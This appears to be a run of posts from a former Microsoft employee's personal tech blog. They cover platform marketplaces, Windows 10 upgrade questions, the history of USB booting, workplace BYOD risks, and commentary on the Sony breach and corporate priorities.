21
Aug 15

The curse of the second mover

When I lived in Alaska, there was an obnoxious shirt that I used to see all the time, with a group of sled dogs pictured on it. The cutesy saying on it was, “If you’re not the lead dog, the view never changes.” While driving home last night and considering multiple tech marketplaces today, it came to mind.

Consider the following. If you were:

  1. Building an application for phones and tablets today, whose OS would you build it for first?
  2. Building a peripheral device for smartphones, what device platform would you build it for?
  3. Selling music today, whose digital music store would you make sure it was in first?
  4. Selling a movie today, whose digital video store would you make sure it was in first?
  5. Publishing a book, whose digital book store would you make sure it was in first?

Unless you’ve got a lot of time or money on your hands, and feel like dealing with the bureaucracy of multiple stores, the answer to all of the above is going to be exactly the same.

Except that last one.

If you’re building apps, smartphone peripherals, or selling music or movies, you’re probably building for Apple first. If you’re publishing or self-publishing a book, you’re probably going to Amazon first. One could argue that you might go to Amazon with music or a movie – but I’m not sure that’s true – at least if you wanted to actually sell full-fare copies vs. getting them placed on Prime Music/Prime Instant Video.

In the list above, that doesn’t tell a great tale for second movers. If you’re building a marketplace, you’ve got to offer some form of exceptional value over Apple (or Amazon for 5) in order to dethrone them. You’ve also got to offer something to consumers to get them to use your technology, and content purveyors/device manufacturers to get them to invest in your platform(s).

For the first three, Apple won those markets through pure first mover advantage.

The early arrival of the iPhone and iOS, and the premium buyers who purchase them, ensure that 1 & 2 will be answered “Apple”. The early arrival of the iPod, iTunes, and “Steve’s compromise”, allowing iTunes on Windows – as horrible as the software was/is – ensures that iTunes Music is still the answer to 3.

Video is a squishy one – as the market is meandering between streaming content (Netflix/Hulu), over-the-top (OTT) video services like Amazon Instant Video, MLB At Bat, HBO Now, etc., and direct purchase video like iTunes or Google Play. But the wide availability of Apple TV devices, entrenchment of iTunes in the life of lots of music consumers, and disposable income mean that a video content purveyor is highly likely to hit iTunes first – as we often see happen with movies today.

The last one is the most interesting though.

If we look at eBooks, something interesting happened. Amazon wasn’t the first mover – not by a long shot. Microsoft made their Reader software available back in 2000. But their device strategy wasn’t harmonized with the ideas from the team building the software. It was all based around using your desktop (ew), chunky laptop (eventually chunky tablet), or Windows Pocket PC device for reading. Basically, it was trying to sell eBooks as a way to read content on Windows, not really trying to sell eBooks themselves. Amazon revealed their first Kindle in 2007. (This was the first in a line of devices that I personally loathe, because of the screen quality and flicker when you change pages.) Apple revealed the iPad, and rapidly launched iBooks in 2010, eventually taking it to the iPhone and OS X. But the first two generations of iPad were expensive, chunky device to try and read on, and iBooks not being available on the iPhone and OS X didn’t help. (Microsoft finally put down the Reader products in 2012, just ahead of the arrival of the best Windows tablets…<sigh/>) So even though Apple has a strong device story today, and a strong content play in so many other areas, they are (at least) the second fiddle in eBooks. They tout strong numbers of active iBooks users… but since every user of iOS and OS X can be an iBooks users, numbers mean little without book sales numbers behind them. Although Amazon’s value driven marketplace may not be the healthiest place for authors to publish their wares, it appears to be the number one place by far, without much potential for it to be displaced anytime soon.

If your platform isn’t in the leader for a specific type of content, pulling ahead from second place is going to be quite difficult, unless you’ve somehow found some silver bullet. If you’re in third, you have an incredible battle ahead.


18
Aug 15

Continuum vs. Continuity – Seven letters is all they have in common

It’s become apparent that there’s some confusion between Microsoft’s Continuum feature in Windows 10, and Apple’s Continuity feature in OS X. I’ve even heard technical people get them confused.

But to be honest, the letters comprising “Continu” are basically all they have in common. In addition to different (but confusingly similar) names, the two features are platform exclusive to their respective platform, and perform completely different tasks that are interesting to consider in light of how each company makes money.

Apple’s Continuity functionality, which arrived first, on OS X Yosemite late in 2014, allows you to hand off tasks between multiple Apple devices. Start a FaceTime call on your iPhone, finish it on your Mac. Start a Pages document on your Mac, finish it on your iPad. If they’re on the same Wi-Fi network, it “just works”. The Handoff feature that switches between the two devices works by showing an icon for the respective app you were using, that lets you begin using the app on the other device. Switching from iOS to OS X is easy. Going the other way is a pain in the butt, IMHO, largely because of how iOS presents the app icon on the iOS login screen.

Microsoft’s Continuum functionality, which arrived in one form with Windows 10 in July, and will arrive in a different (yet similar) form with Windows 10 Mobile later this year, lets the OS adapt to the use case of the device you’re on. On Windows 10 PC editions, you can switch Tablet Mode off and on, or if the hardware provides it, it can switch automatically if you allow it. Windows 10 in Tablet Mode is strikingly similar to, but different from, Windows 8.1. Tablet mode delivers a full screen Start screen, and full-screen applications by default. Turning tablet mode off results in a Start menu and windowed applications, much like Windows 7.

When Windows 10 Mobile arrives later this year, the included incarnation of Continuum will allow phones that support the feature to connect to external displays in a couple of ways. The user will see an experience that will look like Windows 10 with Tablet mode off, and windowed universal apps. While it won’t run legacy Windows applications, this means a Windows 10 Mobile device could act as a desktop PC for a user that can live within the constraints of the Universal application ecosystem.

Both of these pieces of functionality (I’m somewhat hesitant to call either of them “features”, but I digress) provide strategic value for Apple, and Microsoft, respectively. But the value that they provide is different, as I mentioned earlier.

Continuity is sold as a “convenience” feature. But it’s really a great vehicle for hardware lock-in and upsell. It only works with iOS and OS X devices, so it requires that you use Apple hardware and iCloud. In short: Continuity is intended to help sell you more Apple hardware. Shocker, I know.

Continuum, on the other hand, is designed to be more of a “flexibility” feature. It adds value to the device you’re on, even if that is the only Windows device you own. Yes, it’s designed to be a feature that could help sell PCs and phones too – but the value is delivered independently, on each device you own.

With Windows 8.x, your desktop PC had to have the tablet-based features of the OS, even if they worked against your workflow. Your tablet couldn’t adapt well if you plugged it into an external display and tried to use it as a desktop. Your phone was… well… a phone. Continuum is intended to help users make the most of any individual Windows device, however they use it. Want a phone or tablet to be a desktop and act like it? Sure. Want a desktop to deliver a desktop-like experience and a tablet to deliver a tablet-like experience? No problem. Like Continuity, Continuum is platform-specific, and features like Continuum for Windows 10 Mobile will require all-new hardware. I expect that this Fall’s hardware season will likely continue to bring many new convertibles that automatically switch, helping to make the most of the feature, and could help sell new hardware.

Software vendors made Continuity-like functionality before Apple did it, and that’ll surely continue. We’ll see more and more device to device bridging in Android and Windows. However, Apple has an advantage here, with their premium consumer, and owning their entire hardware and software stack.

People have asked me for years if I see Apple making features that look like Continuum. I don’t. At least not trying to make OS X into iOS. We may see Apple try and bridge the tablet and small laptop market here in a few weeks with an iOS device that can act like a laptop, but arguably that customer wouldn’t be a MacBook (Air) customer anyway. It’ll be interesting to see how the iPad evolves/collides into the low-end laptop market.

Hopefully if you were confused about these two features, that helps clarify what they are – and that they’re actually completely different things, designed to accomplish completely different things.


03
Jun 15

Windows 10 and free. Free answers to frequently asked questions.

I keep hearing the same questions over and over again about Windows 10 and the free* upgrade, so I have decided to put together a set of frequently asked questions about the Windows 10 promotion.

Who gets it?

Q: Is Windows 10 really free?

Yes. It is free. Completely free. But only if you meet the qualifications and take Microsoft up on the offer from a qualified PC before July 29th, 2016.

You must have Windows 7, 8, or 8.1 installed on your x86 or x64 system, and it cannot be an Enterprise edition of Windows (only Home, Pro/Professional, Ultimate, or similar. See the bottom of this page for a significant disclaimer.

Q: Can I get the free upgrade if I have some version of Windows RT?

No free upgrade for you. Microsoft has indicated there’s a little something coming in the pipeline for you at some point, but haven’t indicated what that would be. It won’t be Windows 10, and won’t be the full Windows 10 for smartphones and small tablets either. MHO: Expect something more akin to Windows Phone 7.8.

Q: Can I get it for free if I have Enterprise edition of Windows 7, 8, or 8.1?

No. Enterprise edition must be purchased through the Volume Licensing channel, as it always has had to be. Talk to the people in your organization who handle Windows volume licensing.

Q: Can I get it for free if I’m in the Windows Insider program?

No. There’s no magic program rewarding Windows Insiders with a completely free full product. You have to have upgraded the system from a valid license for 7, 8, or 8.1. (See this tweet from @GabeAul.)

Q: Can I get it for free if I have Windows XP or Windows Vista?

No. You’ll need to either buy a legal copy of Windows 7, 8, or 8.1, or just purchase Windows 10 when it becomes available at retail, supposedly in late August, 2015. Your install of Windows does not qualify for the offer.

Q: Can I get it for free if I pirated Windows 7, 8, or 8.1?

Not really, no. If it was “Non-Genuine” before your upgrade, or Windows 10 recognizes it as such, it will still be Non-Genuine after the fact. You may be upgraded, but expect to be nagged. Your OEM might also be able to help you get legit… Or you could always buy a copy.

Q: Can I perform a clean install of Windows 10?

Yes, but you’ll have to do it after you’ve upgraded from a qualified install of Windows 7, 8, or 8.1 first. Then you can perform clean installs on that device at any time. (See yet another tweet from @GabeAul.)

Q: Can I upgrade all of my PCs for free?

Yes, if they each have a qualifying OS version and edition installed. But installing on one device doesn’t give you rights to run Windows 10 on any other system, or move an OEM install to a virtual machine.

Q: Can I upgrade my phone?

This is all about Windows 10 for your x86 or x64 PC, not your Windows Phone. Microsoft will have more details about Windows for phones at some point later this year, when they talk about it being released. It won’t be available at the same time as Windows 10 for PCs and tablets.

 

What edition do I get?

Q: I have Media Center, K, N, Ultimate, or some other transient edition – what do I get?

Check out “What edition of Windows will I get as a part of this free upgrade?” on this page. If you have a K or N install, you will be upgraded to the parent edition for the K or N OS you are licensed for.

Q: When will I get the upgrade?

See “What happens when I reserve?” on this page. In general, once you reserve on that device, it’ll download automatically and you’ll be notified when it is ready to install, on or about July 29th, 2015.

 

What breaks if I upgrade?

Q: Can I still run Windows Media Center after I upgrade to Windows 10?

No. According to this page, if you upgrade a system that is running Media Center software to Windows 10, it will be uninstalled. If you use/love Media Center on a given system, I would strongly advise not upgrading to Windows 10 on that system, as it will be deleted.

Mass hysteria

Q: Is this thing running in my system notification area malware?

You might have malware, but the little flag running over there isn’t it. It’s just Microsoft working to get every qualified Windows install that they can to Windows 10 within a year’s time. Enjoy your free lunch.

Q: How do I stop users in my organization from installing Windows 10 on systems I manage?

If it’s a domain-joined Windows Pro system, or a Windows Enterprise system, have no fear. They aren’t getting prompted.

Q: How do I stop users in my organization from installing Windows 10 on BYOD systems I don’t manage?

If it is a system running Windows Home (or similar, like “Windows 8.1” with no suffix), or a Windows Pro/Professional) system that isn’t joined to the domain, and you don’t manage it in any way, you’re kind of up the creek on this one. This article provides info on KB3035583, which needs to be uninstalled to stop the promotion, and you’ll need to figure out a way to remove it on each of those systems.

 

Q: Microsoft will charge me in a year for updates, won’t they?

No. They won’t. Microsoft has stated that they will not charge for “free, ongoing security updates for the supported lifetime of the device.” Microsoft may well charge for a future upgrade to some other version of the OS. But I don’t see them going back on this as stated.

 


22
May 15

Be the toolmaker

We are toolmakers, humankind.

To resist this tendency to solve riddles, to complete tasks faster, with more efficiency, with less risk or human cost, is to resist our gift of ingenuity.

Humans are not born to be cogs. We are not born to be tools.

We are born to be toolmakers – to make the world better than we found it.

Making tools is not without risk or obligation, however. Efficiency often comes with financial benefit to the toolmaker, but human costs to those replaced by the tool.

The obligation isn’t to preserve the role of humans performing the menial tasks that toolmakers can, and gradually will, automate and replace.

The obligation is to lift up people affected by shifting tides of technology and efficiency, and help them to become toolmakers themselves.

To enable them to make their lives better due to advancing technology, not worse.


22
May 15

Farewell, floppy diskette

I never would have imagined myself in an arm-wrestling match with the floppy disk drive. But sitting where I did in Windows setup, that’s exactly what happened. A few times.

When I had started at Microsoft, a boot floppy was critical to setting up a new machine. Not by the time I was in setup. Since Remote Installation Services (RIS) could start with a completely blank machine, and you could now boot a system to WinPE using a CD, there were two good-sized nails in the floppy diskette’s coffin.

Windows XP was actually the first version of Windows that didn’t ship with boot floppies. It only shipped with a CD. While you could download a tool that would build boot floppies for you, most computers that XP happily ran on supported CD boot by that time. The writing was on the wall for the floppy diskette. In the months after XP released, Bill Gates made an appearance on the American television sitcom Frasier. Early in the episode, a caller asks about whether they need diskettes to install Windows XP. For those of us on the team, it was amusing. Unfortunately, the reality was that behind the scenes, there were some issues with customers whose systems didn’t boot from CD, or didn’t boot properly, anyway. We made it through most of those those birthing pains, though.

It was both a bit amusing and a bit frustrating to watch OEMs early on during the early days of Windows XP; while customers often said, “I want a legacy free system”, they didn’t know what that really meant. By “legacy free”, customers usually meant they wanted to abandon all of the legacy connectors (ports) and peripherals used on computers before USB had started to hit its stride with Windows 98.

While USB had replaced serial in terms of mice – which were at one time primarily serial – the serial port, parallel port, and floppy disk controller often came integrated together in the computer. We saw some OEMs not include a parallel port, and eventually not include a floppy diskette, but still include a serial port – at least inside – for when you needed to debug the computer. When a Windows machine has software problems, you often hook it up to a debugger, an application on another computer, where the developer can “step through” the programming code to figure out what is misbehaving. When Windows XP shipped, a serial cable connection was the primary way to debug.  Often, to make the system seem more legacy free than it actually was, this serial port was tucked inside the computer’s case – which made consumers “think” it was legacy free when it technically wasn’t. PCs often needed BIOS updates, too – and even when Windows XP shipped with them, these PCs would still usually boot to an MS-DOS diskette in order to update the BIOS.

My arrival in the Windows division was timely; when I started, USB Flash Drives (UFDs) were just beginning to catch on, but had very little storage space, and the cheapest ones were slow and unreliable. 32MB and 64MB drives were around, but still not commonplace. In early 2002, the idea of USB booting an OS began circling around the Web, and I talked with a few developers within The Firm about it. Unfortunately, there wasn’t a good understanding of what would need to happen for it to work, nor was the UFD hardware really there yet. I tabled the idea for a year, but came back to it every once in a while, trying to research the missing parts.

As I tinkered with it, I found that while many computers supported boot from USB, they only supported USB floppy drives (a ramshackle device that had come about, and largely survived for another 5-10 years, because we were unable to make key changes to Windows that would have helped killed it). I started working with a couple of people around Microsoft to try and glue the pieces together to get WinPE booting from a UFD. I was able to find a PC that would try to boot from the disk, and failed because the disk wasn’t prepared for boot as a hard disk normally would be. I worked with a developer from the Windows kernel team and one of our architects to get a disk formatted correctly. Windows didn’t like to format UFDs as bootable because they were removable drives; even Windows to Go in Windows 8.1 today boots from special UFDs which are exceptionally fast, and actually lie to the operating system about being removable disks. Finally, I worked with another developer who knew the USB stack when we hit a few issues booting. By early 2003, we had a pretty reliable prototype that worked on my Motion Computing Tablet PC.

Getting USB boot working with Windows was one of the most enjoyable features I ever worked on, although it wasn’t a formal project in my review goals (brilliant!). USB boot was even fun to talk about, amongst co-workers and Microsoft field employees. You could mention the idea to people and they just got it. We were finally killing the floppy diskette. This was going to be the new way to boot and repair a PC. Evangelists, OEM representatives, and UFD vendors came out of the woodwork to try and help us get the effort tested and working. One UFD manufacturer gave me a stash of 128MB and larger drives – very expensive at the time – to prepare and hand out to major PC OEMs. It gave us a way to test, and gave the UFD vendor some face time with the OEMs.

For a while, I had a shoebox full of UFDs in my office which were used for testing; teammates from the Windows team would often email or stop by asking to get a UFD prepped so they could boot from it. I helped field employees get it working so many times that for a while, my nickname from some in the Microsoft field was “thumbdrive”, one of the many terms used to refer to UFDs.

Though we never were able to get UFD booting locked in as an official feature until Windows Vista, OEMs used it before then, and it began to go mainstream. Today, you’d be hard pressed to find a modern PC that can’t boot from UFD, though the experience of getting there is a bit of a pain, since the PC boot experience, even with new EFI firmware, still (frankly) sucks.

Computers usually boot from their HDD all the time. But when something goes wrong, or you want to reinstall, you have to boot from something else; a UFD, CD/DVD, PXE server like RIS/WDS, or sometimes an external HDD. Telling your Windows computer what to boot from if something happens is a pain. You have to hit a certain key sequence that is often unique to each OEM. Then you often have to hit yet another key (like F12) to PXE boot. It’s a user experience only a geek could love. One of my ideas was to try and make it easier not only for Windows to update the BIOS itself, but for the user to more easily say what they wanted to boot the PC from (before they shut it down, or selecting from a pretty list of icons or a set of keys – like Macs can do). Unfortunately, this effort largely stalled out for over a decade until Microsoft delivered a better recovery, boot, and firmware experience with their Surface tablets. Time will tell whether we’re headed towards a world where this isn’t such a nuisance anymore.

It’s actually somewhat amusing how much of my work revolved around hardware even though I worked in an area of Windows which only made software. But if there was one commonly requested design change request that I wish I could have accommodated but couldn’t ever get done, it was F6 from UFD. Let me explain.

When you install Windows, it attempts to use the drivers it ships with on the CD to begin copying Windows down onto the HDD, or to connect over the network to start setup through RIS.

This approach worked alright, but it had one little problem which became significant. Not long after Windows XP shipped, new categories of networking and storage devices began arriving on high-end computers and rapidly making their way downmarket; these all required new drivers in order for Windows to work. Unfortunately, none of these drivers were “in the box” (on the Windows CD) as we liked to say. While Windows Server often needed special drivers to install on some high-end storage controllers before, this was really a new problem for the Windows consumer client. All of a sudden we didn’t have drivers on the CD for the devices that were shipping on a rapidly increasing number of new PCs.

In other words, even with a new computer and a stock Windows XP CD in your hand, you might never get it working. You needed another computer and a floppy diskette to get the ball rolling.

Early on during Windows XP’s setup, it asks you to press the keyboard’s F6 function key if you have special drivers to install. If it can’t find the network and you’re installing from CD, you’ll be okay through setup – but then you have no way to add new drivers or connect to Windows Update. If you were installing through RIS and you had no appropriate network driver, setup would fail. Similarly, if you had no driver for the storage controller on your PC, it wouldn’t ever find find a HDD where it could install Windows – so it would terminally fail too. It wasn’t pretty.

Here’s where it gets ugly. As I mentioned, we were entering an era where OEMs wanted to ship, and often were shipping, those legacy-free PCs. These computers often had no built-in floppy diskette – which was the only place we could look for F6 drivers at the time. As a result, not long after we shipped Windows XP, we got a series of design change requests (DCRs) from OEMs and large customers to make it so Windows setup could search any attached UFD for drivers as well. While this idea sounds easy, it isn’t. This meant having to add Windows USB code into the Windows kernel so it could search for the drives very early on, before Windows itself has actually loaded and started the normal USB stack. While we could consider doing this for a full release of Windows, it wasn’t something that we could easily do in a service pack – and all of this came to a head in 2002.

Dell was the first company to ever request that we add UFD F6 support. I worked with the kernel team, and we had to say no – the risk of breaking a key part of Windows setup was too great for a service pack or a hotfix, because of the complexity of the change, as I mentioned. Later, a very large bank requested it as well. We had to say no then as well. In a twist of fate, at Winternals I would later become friends with one of the people who had triggered that request, back when he was working on a project onsite at that bank.

Not adding UFD F6 support was, I believe, a mistake. I should have pushed harder, and we should have bitten the bullet in testing it. As a result of us not doing it, a weird little cottage industry of USB floppy diskette drives continued for probably a decade longer than it should have.

So it was, several years after I left, that the much maligned Windows Vista brought both USB boot of WinPE and also brought USB F6 support so you could install the operating system on hardware with drivers newer than Windows XP, and not need a floppy diskette drive to get through setup.

As I sit here writing this, it’s interesting to consider the death of CD/DVD media (“shiny media”, as I often call it) on mainstream computers today. When Apple dropped shiny media on the MacBook Air, people called them nuts – much as they did when Apple dropped the floppy diskette on the original iMac years before. As tablets and Ultrabooks have finally dropped shiny media drives, there’s an odd echo of the floppy drive from years ago. Where external floppy drives were needed for specific scenarios (recovery and deployment), external shiny media drives are still used today for movies, some storage and installation of legacy software. But in a few years, shiny media will be all but dead – replaced by ubiquitous high-speed wired and wireless networking and pervasive USB storage. Funny to see the circle completed.


21
May 15

Comments closed

I’m tired of filtering out spam from the comments. As a result, if you want to comment on a post, find me on Twitter.

Thanks for reading.


12
Feb 15

Bring your own stuff – Out of control?

The college I went to had very small cells… I mean dorm rooms. Two people to a small concrete walled-room, with a closet, bed, and desk that mounted to the walls. The RA on my floor (we’ll call him “Roy”) was a real stickler about making us obey the rules – no televisions or refrigerators unless they were rented from the overpriced facility in our dorm. After all, he didn’t want anybody creating a fire hazard.

But in his room? A large bench grinder and a sanding table, among other toys. Perhaps it was a double standard… but he was the boss of the floor – and nobody in the administration knew about it.

Inside of almost every company, there are several types of Roy, bringing in toys that could potentially harm the workplace. Most likely, the harm will come in the form of data loss or a breach, not a fire as it might if they brought in a bench grinder. But I’m really starting to get concerned that too many companies aren’t mindful of the volume of toys that their own Roys have been bringing in.

Basically, there are three types of things that employees are bringing in through rogue or personal purchasing:

  • Smartphones, tablets, and other mobile devices (BYOD)
  • Standalone software as a service
  • Other cloud services

It’s obvious that we’ve moved to a world where employees are often using their own personal phones or tablets for work – whether it becomes their main device or not. But the level of auditing and manageability offered by these devices, and the level of controls that organizations are actively enforcing on them, all leave a lot to be desired. I can’t fathom the number of personal devices today, most of them likely equipped with no passcode or a weak one, that are currently storing documents that they shouldn’t be. That document that was supposed to be kept only on the server… That billing spreadsheet with employee salaries or patient SSNs… all stored on someone’s phone, with a horrible PIN if one at all, waiting for it to be lost or stolen.

Many “freemium” apps/services offer just enough rope for an employee to hang their employer with. Sign up with your work credentials and work with colleagues – but your management cannot do anything to manage them – without (often) paying.

Finally, we have developers and IT admins bringing in what we’ll call “rogue cloud”. Backing up servers to Azure… spinning up VMs in AWS… all with the convenience of a credit card. Employees with the best of intentions can smurf their way through, getting caught by internal procedures or accounting. A colleague tells a story about a CFO asking, “Why are your developers buying so many books?” The CFO was, of course, asking about Amazon Web Services, but had no idea, since the charges were small irregular amounts every month across different developers, from Amazon.com. I worry that the move towards “microservices” and cloud will result in stacks that nobody understands, that run from on-premises to one or more clouds – without an end-to-end design or security review around them.

Whether we’re talking about employees bringing devices, applications, or cloud services, the overarching problem here is the lack of oversight that so many businesses seem to have over these rapidly growing and evolving technologies, and the few working options they have to remediate them. In fact, many freemium services are feeding on this exact problem, and building business models around it. “I’m going to give your employees a tool that will solve a problem they’re having. But in order for you to solve the new problem that your employees will create by using it, you’ll need to buy yet another tool, likely for everybody.”

If you aren’t thinking about the devices, applications, and services that your employees are bringing in without you knowing, or without you managing them, you really might want to go take a look and see what kinds of remodeling they’ve been doing to your infrastructure without you noticing. Want to manage, secure, integrate, audit, review, or properly license the technology your employees are already using? You may need to get your wallet ready.


24
Dec 14

Mobile devices or cloud as a solution to the enterprise security pandemic? Half right.

This is a response to Steven Sinofsky’s blog post, “Why Sony’s Breach Matters”. While I agree with parts of his thesis – the parts about layers of complexity leaving us where we are, and secured, legacy-free mobile OS’s helping alleviate this on the client side, I’m not sure I agree with his points about the cloud being a path forward – at least in any near term, or to the degree of precision he alludes to.

The bad news is that the Sony breach is not unique. Not by a long shot. It’s not the limit. It’s really the beginning. It’s the shot across the bow for companies that will let them see one example of just how bad this can get. Of course, they should’ve been paying attention to Target, Home Depot, Michaels, and more by this point already.

Instead, the Sony breach is emblematic of the security breaking point that has become increasingly visible over the last 2 years. It would be the limit if the industry turned a corner tomorrow and treated security like their first objective. But it won’t. I believe what I’ve said before – the poor security practices demonstrated by Sony aren’t unique. They’re typical  of how too many organizations treat security. Instead of trying to secure systems, they grease the skids just well enough to meet their compliance bar, turning an eye to security that’s just “too hard”.

 

While the FBI has been making the Sony attack sound rather unique, the only unique aspect of this one, IMHO, is the scale of success it appears to have achieved. This same attack could be replayed pretty easily. A dab of social engineering… a selection of well-chosen exploits (they’re not that hard to get), and Windows’ own management infrastructure appears to have been used to distribute it.

 

I don’t necessarily see cloud computing yet as the holy grail that you do. Mobile? Perhaps.

 

The personal examples you discussed were all interesting examples, but indeed were indicative of more of a duct-tape approach, similar to what we had to do with some things in Windows XP during the security push that led up to XPSP2 after XPSP1 failed to fill the holes in the hull of the ship. A lot of really key efforts, like run as non-admin just couldn’t have been done in a short timeframe to work with XP – had to be pushed to Vista (where they honestly still hurt users) or Windows 7 where the effort could be taken to really make them work for users from the ground up. But again, much of this was building foundations around the Win32 legacy, which was getting a bit sickly in a world with ubiquitous networking and everyone running as admin.

 

I completely agree as well that we’re long past adding speed bumps. It is immediately apparent, based upon almost every breach I can recall over the past year, that management complexity as a security vector played a significant part in the breach.

If you can’t manage it, you can’t secure it. No matter how many compliance regs the government or your industry throws at you. It’s quite the Gordian knot. Fun stuff.

 

 

I think we also completely agree about how the surface area exposed by today’s systems is to blame for where we are today as well. See my recent Twitter posts. As I mentioned, “systems inherently grow to become so complex nobody understands them.” – whether you’re talking about programmers, PMs, sysadmins, or compliance auditors.

 

 

I’m inclined to agree with your point about social and the vulnerabilities of layer 8, and yet we also do live in a world where most adults know not to stick a fork into an AC outlet. (Children are another matter.)

Technology needs to be more resilient to user-error or malignant exploitation, until we can actually solve the dancing pigs problem where it begins. Mobile solves part of that problem.

 

When Microsoft was building UAC during Longhorn -> Vista, Mark Russinovich and I were both frustrated that Microsoft wasn’t really doing anything with Vista to really nail security down, and so we built a whitelisting app at Winternals to do this for Windows moving forward. (Unfortunately, Protection Manager was crushed for parts after our acquisition, and AppLocker was/is too cumbersome to accomplish this for Win32. Outside of the longshot of ditching the Intel processor architecture completely, whitelisting is the only thing that can save Win32 from the security mayhem it is experiencing at the moment.

 

I do agree that moving to hosted IaaS really does nothing for an organization, except perhaps drive them to reduce costs in a way that on-premises hosting can’t.

But I guess if there was one statement in particular that I would call out in your blog as something I heartily disagree with, it’s this part:

 

“Everyone has moved up the stack and as a result the surface area dramatically reduced and complexity removed. It is also a reality that the cloud companies are going to be security first in terms of everything they do and in their ability to hire and maintain the most sophisticated cyber security groups. With these companies, security is an existential quality of the whole company and that is felt by every single person in the entire company.”

 

This is a wonderful goal, and it’ll be great for startups that have no legacy codebase (and don’t bring in hundreds of open-source or shared libraries that none of their dev team understands down to the bottom of the stack). But most existing companies can’t do what they should, and cut back the overgrowth in their systems.

I believe pretty firmly that what I’ve seen in the industry over the last decade since I left Microsoft is also, unfortunately, the norm – that management – as demonstrated by Sony’s leadership in that interview, will all too often let costs win over security.

 

For organizations that can redesign for a PaaS world, the promise offered by Azure was indeed what you’ve suggested – that designing new services and new applications for a Web-first world can lead to much more well-designed, refined, manageable, and securable applications and systems overall. But the problem is that that model only works well for new applications – not applications that stack refinement over legacy goo that nobody understands. So really, clean room apps only.

The slow uptake of Azure’s PaaS offerings unfortunately demonstrates that this is the exception, and an ideal, not necessarily anything that we can expect to see become the norm in the near future.

 

Also, while Web developers may not be integrating random bits of executable code into their applications, the amount of code reuse across the Web threatens to do the same, although the security perimeter is winnowed down to the browser and PII shared within it. Web developers can and do grab shared .js libraries off the Web in a heartbeat.

Do they understand the perimeter of these files? Absolutely not. No way.

Are the risks here as big as those posed by an unsecured Win32 perimeter? Absolutely not – but I wouldn’t trivialize them either.

There are no more OS hooks, but I’m terrified about how JS is evolving to mimic many of the worst behaviors that Win32 picked up over the years. The surface has changed, as you said – but the risks – loss of personal information, loss of data, phishing, DDOS, are so strikingly similar, especially as we move to a “thicker”, more app-centric Web.

 

Overall, I think we are in for some changes, and I agree with what I believe you’ve said both in your blog and on Twitter, that modern mobile OS’s with a perimeter designed in them are the only safe path forward. The path towards a secure Web application perimeter seems less clear, far less immediate, and perhaps less explicit than your post seemed to allude to.

 

There is much that organizations can learn from the Sony breach.

 

But will they?

 


15
Dec 14

Who shot Sony?

I’m curious about the identity of the group that broke in to Sony, apparently caused massive damage, and compromised a considerable amount of information that belongs to the company.

For some reason, journalists aren’t focusing on this, however. Probably because it doesn’t generate the clicks and ad views that publishing embarrassing emails, salary disclosures, and documented poor security practices do. Instead, they’re primarily focusing on revealing Sony’s confidential information, conveniently provided in multiple, semi-regular doc dumps by the party behind the breach.

Sony’s lawyers recently sent several publications a cease & desist letter, to get reporters to stop publishing the leaked information, since Sony “does not consent to your possession, review, copying, dissemination, publication, uploading, downloading or making any use” of the documents”. There’s been quite a stir that in doing this, Sony is likely invoking the Streisand effect, and it will probably not only backfire, but result in more, not less, coverage of the information.

In information available long before the breach, Sony’s executive director of information security was quoted as saying,“it’s a valid business decision to accept the risk” of a security breach. “I will not invest $10 million to avoid a possible $1 million loss”. Given that sort of security posture, it’s not surprising that even though he was able to talk an auditor out of dinging them for SOX compliance, Sony organizations have faced not one, but two rather devastating hacks in recent years.

So it would seem that Sony’s management is likely to blame for leaving doors open by reinforcing poor security practices and actually fighting back against well-intentioned compliance efforts (thus reinforcing what I’ve long said, “Compliance and security can go hand in hand. But security is never achieved by stamping a system as ‘compliant’.”)

It’s also obvious that the group that hacked in to Sony (perhaps with the assistance of either existing or previous employees), compromised confidential information and destroyed systems deserves a huge amount of blame in terms of the negative effects Sony is currently experiencing. Again, if Sony had proper security in place (and execs more interested in security than rubber-stamping systems), perhaps these people wouldn’t have stood a chance. In terms of media coverage, this is what I’d like to know more about. Who  actually broke in?

However, years from now, when people are looking back at the broad damage caused by the breach and the leaked information, I believe it’ll be important to really note who caused the most damage to Sony over the long run. Yes, the people who broke in started it all. But the damage being caused by journalists taking advantage of the document dumps is, and will continue to, result in significant damage to Sony. For myself, from now on, I’m only linking to, and reposting articles that appear to be using information that has not been sourced from the breach from now on.

I’m no longer feeding the clickbait machine that enthusiastically awaits the next doc drop of Sony confidential information, like a vulture ready to pick them while they’re weak, and expose the inner disfunction of an organization (not something unique to Sony – every org has some level of dysfunction).

On Twitter this morning, I pondered whether the NYT would be so enthusiastic and supportive about the journalistic value of confidential info that was regularly being pushed out by hackers if they themselves had been breached, and it was their secrets, their dysfunction, their personal information, their source lists that was being taken advantage of to generate ad views.

For some reason, I have to think the answer is no. So why are journalists so enthusiastic about kicking Sony while they’re down after a breach?


03
Dec 14

Shareholder Shackles

Recently, Michael Dell wrote about the after-effects of taking his company private. I think his words are quite telling:

“I’d say we got it right. Privatization has unleashed the passion of our team members who have the freedom to focus first on innovating for customers in a way that was not always possible when striving to meet the quarterly demands of Wall Street.”, and “The single most important thing a company can do is invest and innovate to help customers succeed…”

Early on in my career at Microsoft, executives would often exclaim “our employees are our best asset.” By the time I left in 2004, however, it was pointedly clear that “shareholder value!” was the priority of the day. Problem is, most underling employees aren’t significant shareholders. In essence, executive leadership’s number one priority wasn’t building great products or retaining great employees, but in making money for shareholders. That’s toxic.

I distinctly recall the day that SteveB held an all-hands meeting where the move to deliver a dividend was announced for the first time in 2003. He was ecstatic, as he should have been. It was a huge jab in the side of institutional investors that had been pushing him to pass on the cash hoard to them. Being the second most significant shareholder at the time, it of course was a windfall for him, financially.

But most employees? They held some stock, sure. But not massive quantities. So this was, in effect, taking the cash that employees had worked their asses off to earn, and chucking it out at shareholders, whose most significant investment had been cash to try and keep the stock, stuck in a dead calm for years (and for years after), moving up.

After Steve announced the dividend in the “town hall” meeting that day, he asked if there were any questions from the room full of employees physically present there. There were no questions. Literally zero questions. For some reason, he seemed surprised.

I was watching the event from my office with a colleague, now also separated from Microsoft. I turned to him and asked, “Do you know why there are no questions?” He replied “no”, and I stated, “because this change he just announced means effectively nothing to more than 95% of the people in that room.

